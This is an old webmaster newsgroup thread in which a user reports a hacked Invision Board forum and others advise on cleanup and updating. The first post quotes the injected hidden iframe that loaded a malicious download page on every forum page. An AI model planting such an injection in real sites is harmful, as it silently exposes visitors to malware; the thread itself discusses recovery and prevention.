- Invison Forum hacked
- Posted by dustie on March 13th, 2006
hi all
my website forum (which uses Invision Board v1.3) has been hacked and I've
found that the bottom of the source code of every page has now had this
embedded in it:
</div>
<iframe src="http://traffmoney.biz/dl/adv623.php" width=1 height=1></iframe>
</body>
this has the effect of trying to download a file that my Anti-Virus software
blocks out. All my users were getting it too so I've had to take the forum
offline...
does anyone have any idea how I get rid of it? my web hosts say that
someone tried to upload a "root kit" but didn't succeed. they've recommended
I wipe the forum and start again but I'm hugely reluctant to do that as I'll
lose three years of data and there's no guarantee it won't happen again!
surely, I can't be the only Invison Board user who this has happened to?
can anyone help?
thanks in advance...
- Posted by Karl Groves on March 13th, 2006
"dustie" <xxdjdustxx@ntlworld.com> wrote in
news
ojRf.2664$_W6.422@newsfe5-win.ntli.net:
You do realize that they're now up to version 2.1.x, right?
There are undoubtedly several security fixes between your version and the
latest...
--
Karl Groves
http://karlcore.com
http://chevelle.karlcore.com
Accessibility Discussion List: http://smallerurl.com/?id=6p764du
- Posted by Viper on March 14th, 2006
dustie wrote:
And this is why its a BAD idea to go with a free board script....
- Posted by Nirmal on March 14th, 2006
I have no idea about invision board. I'm using phpbb... But what I can
tell you is that you must keep your board script up to date if you are
using free well-known scripts...
I do not agree with viper. Reason is this there is no software without
bugs. Everything has a vulnerable point. but the thing is, with being
open source free software the fix is quick. as free software guys say
"many eyes make all bugs shallow".
Don't be astonished if someone freezed the whole google servers by
exploiting some bugs. Always there are people who can outsmart many
others. This is the rule for anything.
Since invision board stands where it is being generous and open; having
many watchful eyes and rapid fixes; having an excellent user community;
improvement in an unpreceded rate; and last but not least, being free.
_____________________________
Nirmal
http://www.viduranet.com/
http://www.viduranet.com/trillionawards/index.html
- Posted by SmakDaddy on March 14th, 2006
----- Original Message -----
From: "dustie" <xxdjdustxx@ntlworld.com>
Newsgroups: alt.www.webmaster
Sent: Monday, March 13, 2006 11:05 AM
Subject: Invison Forum hacked
All that's been done is defacement.
Happens alot to those running software that's never updated.
Learned your lesson now?
Go to your Database Admin. Backup and download it locally to your machine.
Then get into your files on the server.
What you're looking for is where the dude put his include.
Most likely, if I remember correctly, it'll be in the footer.tpl of the
theme you're using.
Maybe the index.
Find and delete.
It'll be easier if you just simply ftp up to your forum and download the
files.
Open all the germane files in a txt editor and run a search/replace.
Then reload/rewrite back up.
Immediately go and update the software. IV is easy to update.
Then you should be good to go.
Things to remember and/or think about.
1. Backup your database once a week.
2. Don't allow users to upload attachments if you don't know how to manage
them.
3. Go to your logs and hunt down the ip of the attacker and block the whole
range.
There are three types of people in the world.
Those that make things happen.
Those that simply watch what happens.
Those who wonder what happened.
Don't get caught again with your pants down unless you've got a broadband
webcam.
SmakDaddy
- Posted by Viper on March 14th, 2006
Nirmal wrote:
bug/security fixes are always out fast...
- Posted by Nirmal on March 14th, 2006
Yes, also the situation is same with phpbb. But we consciously find
problems and publish in places like this. So we, software engineers or
designers of that software can fix those errors quickly. That's why I
mentioned "many eyes make all bugs shallow"
_____________________________
Nirmal
http://www.viduranet.com/linkexchange/
http://www.viduranet.com/bookstore/
- Posted by T Wake on March 14th, 2006
"SmakDaddy" <smak@> wrote in message
news:121cidck1mv9tbc@corp.supernews.com...
<Snip very, very good advice>
Excellent response and to crown it all you make me spit water all over my
keyboard. For some reason I found this very, very amusing.
I need to get out more.
- Posted by Paul Ding on March 14th, 2006
On 13 Mar 2006 21:53:03 -0800, "Nirmal" <k.vidura@gmail.com> posted
something that included:
Many eyes also make all vulnerabilities visible.
One of the advantages of non-free (as in beer) is that those who work
on a project have a financial incentive to make it succeed.
When you have ill feelings, such as with the Mambo-Joomla rift, it
seems pretty inevitable that you're going to have a few people working
on Mambo who want to see it fail. Disgruntled employees tend to quit
on pay projects. Well, either that, or come back with a semiautomatic
rifle and shoot everyone.
--
AmishHosting.com
- Posted by Kim André Akerĝ on March 14th, 2006
Viper wrote:
....that has since gone over to be a fully commercial (and paid) board
script (since a certain version number).
I used to have Invision Board installed on my server space, right up to
the point where they stopped providing it for free. After that, I
closed access to my board and haven't used it since (it wasn't used
much anyway).
--
Kim André Akerĝ
- kimandre@NOSPAMbetadome.com
(remove NOSPAM to contact me directly)
